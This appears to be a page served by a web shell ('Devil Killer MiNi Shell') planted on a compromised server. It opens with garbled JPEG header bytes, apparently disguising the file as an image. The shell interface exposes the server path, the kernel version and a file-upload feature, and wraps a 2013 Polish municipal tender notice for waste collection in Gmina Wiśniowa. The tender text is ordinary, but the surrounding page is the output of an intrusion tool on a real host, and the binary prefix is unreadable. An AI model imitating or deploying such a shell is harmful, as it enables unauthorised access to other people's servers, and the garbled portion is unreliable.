JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131114/464946-N-2013.html

<p class="kh_header"><b>Wiśniowa: Odbiór  i zagospodarowanie  odpadów  komunalnych  z  terenu  Gminy Wiśniowa</b><br>
<b>Numer ogłoszenia: 464946 - 2013; data zamieszczenia: 14.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wiśniowa , Wiśniowa 150, 38-124 Wiśniowa, woj. podkarpackie, tel. 017 2775062.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wisniowa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór  i zagospodarowanie  odpadów  komunalnych  z  terenu  Gminy Wiśniowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa polegająca na odbieraniu odpadów komunalnych od właścicieli nieruchomości zamieszkałych na terenie Gminy Wiśniowa oraz ich zagospodarowaniu. 

2.	Odpady będą odbierane z terenu gminy Wiśniowa od mieszkańców, którzy mieszkają stale i czasowo  na terenie 13 sołectw: Wiśniowa, Pstrągówka, Szufnarowa, Jaszczurowa, Tułkowice, Kożuchów, Kalembina, Niewodna, Różanka, Jazowa,  Kozłówek, Markuszowa, Oparówka.

3.	Odpady odbierane będą od ok. 7 500 osób zamieszkujących ok.  2 000 nieruchomości.

4.	 Zakres przedmiotu zamówienia obejmuje odbiór i zagospodarowanie:
1)	Zmieszanych niesegregowanych odpadów komunalnych o kodzie 20 03 01 zgromadzonych 
w workach i pojemnikach  z budynków mieszkalnych,  w ilości ok. 371  Mg.
2)	Segregowanych odpadów komunalnych, gromadzonych w odpowiednio oznakowanych workach lub pojemnikach i wystawionych na trasie odbioru, podanych poniżej rodzajów odpadów w ilości ok. 236 Mg :
a)	papier, metale, tworzywa sztuczne i opakowania wielomateriałowe, oraz opakowania biodegradowalne 20 01 01, 15 01 01, 15 01 04, 20 01 40, 20 01 39, 15 01 02, 15 01 05, 15 01 06, 
b)	szkło  opakowaniowe kolorowe i bezbarwne, ( kod 20 01 02, 15 01 07 )
c)	odpady ulegające biodegradacji ( odpady kuchenne i ogrodowe) ( kod 20 01 08, 20 02 01),
3)	Pozostałych odpadów zebranych z mobilnych punktów zbiórki w łącznej ilości ok. 68 Mg :
a)	Zużytych opon o kodzie 16 01 03,
b)	mebli i odpadów wielkogabarytowych o kodzie 20 03 07,
c)	odpadów budowlanych i rozbiórkowych (z zastrzeżeniem, iż odpady te pochodzą 
z drobnych remontów, na które nie jest wymagane uzyskanie stosownego zezwolenia),
kod 17 01 01, 17 01 02, 17 01 03, 17 01 07, 17 01 80, 17 02 01, 17 02 02, 17 02 03.
4) Oszacowany  wagowy udział % poszczególnych frakcji odpadów wynosi:
odpady zmieszane ok 55 %, papier i tektura ok 1,3%, tworzywa sztuczne ok 14 %, metal  ok 1,7%, szkło ok  16%, odpady biodegradowalne  ok 2%, pozostałe odpady  ok  10%. 

5. Odpady odbierane z terenu gminy będą gromadzone w następujących urządzeniach:
1)	Pojemnikach o poj. 120l lub większych, w dowolnej kolorystyce z zastrzeżeniem, 
że muszą być oznakowane nalepką/nadrukiem w jednoznaczny sposób identyfikującą właściciela nieruchomości (adres nieruchomości) oraz rodzaj przekazywanego odpadu zgodnie z podziałem na frakcje
2)	Workach o poj. 120l na odpady segregowane oraz  60l i 120l na odpady zmieszane 
i odpady biodegradowalne

6.  Worki do gromadzenia odpadów komunalnych posiadać będą następujące kolory :
1)	kolor żółty na papier, metale, tworzywa sztuczne i opakowania wielomateriałowe, oraz opakowania biodegradowalne, 
2)	kolor biały na szkło kolorowe i bezbarwne
3)	 kolor dowolny z wyłączeniem żółtego i białego na pozostałe odpady zmieszane,
4)	kolor dowolny z wyłączeniem żółtego i białego na odpady ulegające biodegradacji
Worki winny być oznakowane (nalepką/nadrukiem w jednoznaczny sposób identyfikującą właściciela nieruchomości (adres nieruchomości) 

7.	Odbiór odpadów z pojemników wystąpić może w przypadku kiedy:
1) właściciel nieruchomości wyposaży się w nie sam (rezygnując tym samym z systemu workowego).
2) w zabudowie wielorodzinnej jeśli mieszkańcy zdeklarują się do wspólnego zbierania odpadów. 
Obecnie na terenie  gminy w miejscowości Wiśniowa znajduje się 2 nieruchomości wielorodzinne, gdzie mieszkańcy zdeklarowali się do wspólnego zbierania  odpadów segregowanych 
O wystąpieniu dodatkowych w/w nieruchomościach zamawiający poinformuje wykonawcę przekazując ich wykaz .

8.	Szacunkowe zapotrzebowanie na worki  w okresie wykonywania zadania wyniesie:
1)	Worek żółty 120 l - ok. 45 150 szt.
2)	Worek biały 120 l - ok. 11 050 szt.

9.	Wykonawca będzie zobowiązany do dostarczenia do siedziby zamawiającego odpowiedniej ilości worków na odpady segregowane (żółte i białe)  i nalepek identyfikacyjnych na odpady segregowane
 i zmieszane, podzielonych na pakiety zgodnie z wykazem przekazanym przez zamawiającego. Dostarczenie pakietów do poszczególnych gospodarstw będzie po stronie zamawiającego. Szczegółowy wykaz zawierający dane nieruchomości wraz z ilością worków i nalepek jaką należy przekazać, zamawiający dostarczy wykonawcy po podpisaniu umowy.

10.	Ogólna łączna liczba nalepek identyfikacyjnych na odpady segregowane i zmieszane w trakcie wykonywania usługi  wyniesie ok. 110 000 szt. Podane ilości są szacunkowe  mogą ulec zmianie 
w trakcie wykonywania usługi, Wykonawcy z tego tytułu nie przysługuje dodatkowe wynagrodzenie.

11.	Odbiór odpadów komunalnych odbywać się będzie:
1)	Odpady zmieszane i segregowane z wyłączeniem biodegradowalnych  odbierane będą dwa razy 
w miesiącu, we wszystkich miejscowościach zgodnie z harmonogramem, ustalonym pomiędzy Wykonawcą,  a Zamawiającym po podpisaniu umowy.
2)	Odpady biodegradowalne odbierane będą we wszystkich miejscowościach gminy Wiśniowa raz na dwa miesiące
3)	Odpady wielkogabarytowe, opony, odpady remontowe i rozbiórkowe odbierane będą 
wzdłuż trasy przejazdu raz na pół roku w terminie ustalonym z Wykonawcą 
12.	 Trasy zbiórki odpadów przebiegają po drogach wojewódzkich, powiatowych, gminnych a także wewnętrznych drogach wiejskich i osiedlowych. Wykonawca winien posiadać pojazdy umożliwiające poruszanie się po drogach o ograniczeniu tonażowym do 3 ton, ponadto drogi prowadzą często po stromych podjazdach.  Szacunkowa długość trasy jaką wykonawca musi pokonać podczas jednego objazdu wynosi ok. 220 km

Szacunkowe długości tras w poszczególnych miejscowościach wynoszą:
1)	Jaszczurowa - ok. 20 km
2)	 Jazowa - ok.5 km
3)	 Kalembina - ok.6 km 
4)	Kozłówek - ok. 6 km
5)	 Kożuchów - ok. 5 km
6)	Markuszowa - ok. 25 km
7)	Niewodna - ok. 8 km
8)	Oparówka - ok. 4 km
9)	Pstrągówka - ok.10 km
10)	Różanka - ok. 40 km
11)	Szufnarowa - ok. 63 km
12)	Tułkowice - ok.10 km
13)	 Wiśniowa - ok. 18 km 
     
13.	 Wykonawca przed zakwalifikowaniem odpadów segregowanych do zmieszanych wynikającym 
z niedopełnienia przez mieszkańca obowiązku selektywnego zbierania odpadów komunalnych, sporządza na tą okoliczność dokumentację (np. oświadczenie, notatka, dokumentacja fotograficzną) umożliwiającą wydanie przez Zamawiającego decyzji administracyjnej naliczającej zmianę wysokości opłaty. Wykaz numerów identyfikacyjnych nieruchomości wraz z dokumentacją poświadczającą nieprawidłową segregację odpadów, Wykonawca przekaże niezwłocznie Zamawiającemu.
14.	W ramach zagospodarowania odpadów podmiot odbierający odpady zobowiązany jest 
do przekazywania odebranych zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania do regionalnej lub  zastępczej regionalnej instalacji do przetwarzania odpadów komunalnych, właściwej dla regionu centralnego województwa podkarpackiego zgodnie z:
1) uchwałą Nr XXIV/409/12 z dnia 27 sierpnia 2012 r. w sprawie  przyjęcia projektu Planu Gospodarki Odpadami dla Województwa Podkarpackiego i uchwalenia Planu Gospodarki Odpadami dla Województwa Podkarpackiego. 
2) Uchwałą nr XXVIII/540/12 z dnia 21 grudnia 2012 r. w sprawie zmiany Uchwały nr XXIV/409/12 Sejmiku Województwa Podkarpackiego z dnia 27 sierpnia 2012 r. w sprawie przyjęcia projektu Planu Gospodarki Odpadami Województwa Podkarpackiego i uchwalenia Planu Gospodarki Odpadami dla Województwa Podkarpackiego.
3) Uchwałą nr XXIV/410/12 z dnia 27 sierpnia 2012r. w sprawie wykonania Planu Gospodarki Odpadami dla Województwa Podkarpackiego.
4) Uchwałą nr XXVI/478/12 z dnia 29 października 2012r. w sprawie zmiany uchwały nr XXIV/410/12 Sejmiku Województwa Podkarpackiego z dnia 27 sierpnia 2012r. w sprawie wykonania planu gospodarki odpadami dla województwa podkarpackiego.
5) Uchwałą nr XXVIII/54/12 z dnia 21 grudnia 2012 r. w sprawie zmiany Uchwały nr XXIV/410/12 Sejmiku Województwa Podkarpackiego z dnia 27 sierpnia 2012r. w sprawie wykonania Planu Gospodarki Odpadami dla Województwa Podkarpackiego zmienionej Uchwałą nr XXVI/478/12 z dnia 29 października 2012r. 
6) Uchwałą nr XXXVII/703/13 z dnia 26 sierpnia 2013r. w sprawie zmiany Uchwały nr XXIV/410/12 Sejmiku Województwa Podkarpackiego z dnia 27 sierpnia 2012 r. w sprawie wykonania Planu Gospodarki Odpadami dla Województwa Podkarpackiego.
6.	W przypadku selektywnie zebranych odpadów komunalnych, w ramach zagospodarowania odpadów, Wykonawca zobowiązany jest do ich przekazywania do instalacji odzysku i unieszkodliwiania, zgodnie z hierarchią postępowania z odpadami, o której mowa w ustawie z dnia 14 grudnia 2012r. o odpadach ( Dz. U. z 2013 poz. 21 tj. ).
15.	 W zakres zamówienia wchodzi także porządkowanie terenu w miejscu gromadzenia odpadów 
w przypadku jego zanieczyszczenia.
16.	Odbioru odpadów komunalnych przez regionalną lub zastępczą instalację do zagospodarowania odpadów uwzględnioną z WPGO zapewnia sobie Wykonawca.
17.	Wykonawca ponosi całkowitą odpowiedzialność za prawidłowe gospodarowanie odebranymi odpadami zgodnie z przepisami obowiązującymi w tym zakresie. Dotyczy to m.in. ewentualnego przeładunku odpadów, transportu odpadów, spraw formalno - prawnych związanych z odbieraniem 
i dostarczaniem odpadów uprawnionemu przedsiębiorcy prowadzącemu działalność w zakresie odzysku lub unieszkodliwiania odpadów komunalnych.
18.	Wykonawca jest zobowiązany do odbioru i gospodarowania odpadami w taki sposób aby osiągnąć na rzecz Gminy odpowiednie poziomy recyklingu i odzysku wynikające z Art.3b oraz ograniczyć masę odpadów komunalnych ulegających biodegradacji przekazywanych do składowania zgodnie z Art. 3c ustawy o utrzymaniu czystości porządku w gminach.
19.	Jeżeli w toku realizacji zamówienia nastąpi uszkodzenie lub zniszczenie pojemników wynikłe z winy Wykonawcy, ich naprawienie i doprowadzenie do stanu poprzedniego należy do Wykonawcy.
20.	Wykonawca jest zobowiązany do spełnienia wszystkich wymagań z art. 9d ustawy o utrzymaniu czystości porządku w gminach.
21.	Wykonawca zobowiązany jest do spełniania przez cały okres wykonywania usługi wszystkich wymogów wynikających z obowiązujących przepisów, dotyczących odbierania i zagospodarowania odpadów komunalnych.
22.	W sytuacjach nadzwyczajnych (jak np. nieprzejezdność lub zamkniecie drogi), gdy nie jest możliwa realizacja usługi zgodnie z umową, sposób i termin odbioru odpadów będzie każdorazowo uzgadniany pomiędzy Zamawiającym i Wykonawcą i może  polegać w szczególności na wyznaczeniu zastępczych miejsc gromadzenia odpadów przez właścicieli nieruchomości, oraz innych terminów ich odbioru. 
W takich przypadkach Wykonawcy nie przysługuje dodatkowe wynagrodzenie.
23.	Wykonawca zobowiązany jest do spełniania przez cały okres wykonywania usługi wszystkich wymogów wynikających z obowiązujących przepisów, dotyczących odbierania i zagospodarowania odpadów komunalnych.
24.	Wykonawca będzie prowadził i przedkładał Zamawiającemu dokumentację z realizacji przedmiotu zamówienia, tj.:
a) Karty przekazania odpadów, sporządzone zgodnie z obowiązującymi przepisami.
b) Kwartalną informację zgodnie z art. 9n ustawy o utrzymaniu czystości i porządku w gminach.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 4000 zł, słownie: cztery tysięcy złotych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony jeżeli wykonawca posiada wpis do Rejestru Działalności Regulowanej prowadzonego przez Wójta Gminy Wiśniowa.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże że:  zrealizował  w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału 
w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie  usługę w zakresie odbioru odpadów komunalnych zmieszanych i segregowanych w ilości co najmniej 500 ton rocznie, załączając jednocześnie dowody potwierdzające, że ta usługa została wykonana lub jest wykonywana należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, iż na czas realizacji  zamówienia będzie dysponował odpowiednim sprzętem:
1.	Co najmniej dwoma samochodami przystosowanymi do odbierania zmieszanych odpadów komunalnych
2.	Co najmniej dwoma samochodami przystosowanymi do odbierania selektywnie zebranych odpadów komunalnych
3.	Co najmniej jednym pojazdem do odbierania odpadów bez funkcji kompaktującej</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli wykonawca posiada opłaconą polisę, 
a w przypadku jej braku inny dokument potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.  Minimalna suma gwarancyjna ubezpieczenia - 70 000 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)wypełniony formularz oferty z wykorzystaniem wzoru (zał. Nr 1 do SIWZ);
2)wypełniony formularz cenowy, (załącznik nr 2)
3)ewentualne pełnomocnictwo,
4)dowód wniesienia wadium (w formie innej niż pieniężna, należy załączyć do oferty w formie oryginału),
5)parafowany projekt umowy (zał. Nr 7 do SIWZ)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.wisniowa.pl   (Sekcja Zamówienia publiczne i przetargi)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wiśniowa, 38-124 Wiśniowa 150, pokój Nr 10.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.11.2013 godzina 10:00, miejsce: Urząd Gminy Wiśniowa, 38-124 Wiśniowa 150, pokój Nr 2 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com